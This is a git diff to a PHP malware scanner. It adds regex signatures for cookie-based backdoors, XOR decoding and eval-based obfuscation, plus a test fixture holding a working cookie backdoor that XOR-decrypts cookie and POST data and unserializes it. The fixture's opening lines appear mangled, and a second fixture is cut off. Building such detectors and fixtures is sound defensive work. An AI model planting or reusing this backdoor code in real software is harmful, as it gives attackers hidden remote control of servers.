diff --git a/src/Exploits.php b/src/Exploits.php index d027063..96355f2 100644 --- a/src/Exploits.php +++ b/src/Exploits.php @@ -431,6 +431,30 @@ class Exploits 'pattern' => '/[;\s]*sg\_load[\s]*\([\s]*[\\\'\"][A-Za-z0-9+\/]{150,}={0,3}[\\\'\"][\s]*\)/i', 'link' => 'https://www.sourceguardian.com', ], + // cookie/session-based PHP backdoor: $_COOKIE is assigned to a local var then accessed via substr key + 'cookie_backdoor' => [ + 'description' => 'Cookie-based backdoor that reads HTTP cookie data using a substring of an obfuscated key to retrieve and execute malicious payloads', + 'level' => CodeMatch::DANGEROUS, + 'pattern' => '/\$_COOKIE[\s]*;.*?@?\$\w+[\s]*\[[\s]*substr[\s]*\(/si', + ], + // XOR decryption via str_repeat used in cookie/session-based backdoors + 'xor_str_repeat' => [ + 'description' => 'XOR decryption using str_repeat is typically used in cookie-based PHP backdoors to decode and execute malicious payloads', + 'level' => CodeMatch::DANGEROUS, + 'pattern' => '/\$\w+[\s]*\[[\s]*0[\s]*\][\s]*\^[\s]*str_repeat[\s]*\(/i', + ], + // str_replace stripping PHP opening tag then eval — used to execute injected code + 'str_replace_eval' => [ + 'description' => 'Stripping PHP opening tags via str_replace with an empty replacement and then passing the result to eval, commonly used in obfuscated backdoors', + 'level' => CodeMatch::DANGEROUS, + 'pattern' => '/str_replace[\s]*\([^,]+,[\s]*["\']["\'][\s]*,.*?\)[\s]*;[^;]*eval[\s]*\(/si', + ], + // urldecode/rawurldecode function name built via string concatenation to evade detection + 'urldecode_obfuscation' => [ + 'description' => 'Obfuscated urldecode or rawurldecode function call built via string concatenation, typically used to hide XOR-based payload decoding in backdoors', + 'level' => CodeMatch::DANGEROUS, + 'pattern' => '/["\']url["\'][\s]*\.[\s]*["\']decode["\']/i', + ], ]; /** diff --git a/tests/Fixtures/malware/cookie_backdoor.php b/tests/Fixtures/malware/cookie_backdoor.php new file mode 100644 index 0000000..4848d3e --- /dev/null +++ b/tests/Fixtures/malware/cookie_backdoor.php @@ -0,0 +1,49 @@ +loadPayload('arg'); + } + + public function __construct($arg = 0) + { + $post = $_POST; + $cookies = $_COOKIE; + $key = '301407a7-7bdd-4637-b5c9-06e442e49d5a'; + $data = @$cookies[substr($key, 0, 4)]; + if (!empty($data)) { + $parts = explode(',', $data); + $raw = ''; + foreach ($parts as $part) { + $raw .= @$cookies[$part]; + $raw .= @$post[$part]; + } + $raw = array_map('base64_decode', array($raw)); + $raw = $raw[0] ^ str_repeat($key, (strlen($raw[0]) / strlen($key)) + 1); + BackdoorLoader::$store = @unserialize($raw); + } + } + + public static $store = false; +} + +$loader = new BackdoorLoader(0); diff --git a/tests/Fixtures/malware/globals_include_backdoor.php b/tests/Fixtures/malware/globals_include_backdoor.php new file mode 100644 index 0000000..4a52bba --- /dev/null +++ b/tests/Fixtures/malware/globals_include_backdoor.php @@ -0,0 +1,28 @@ +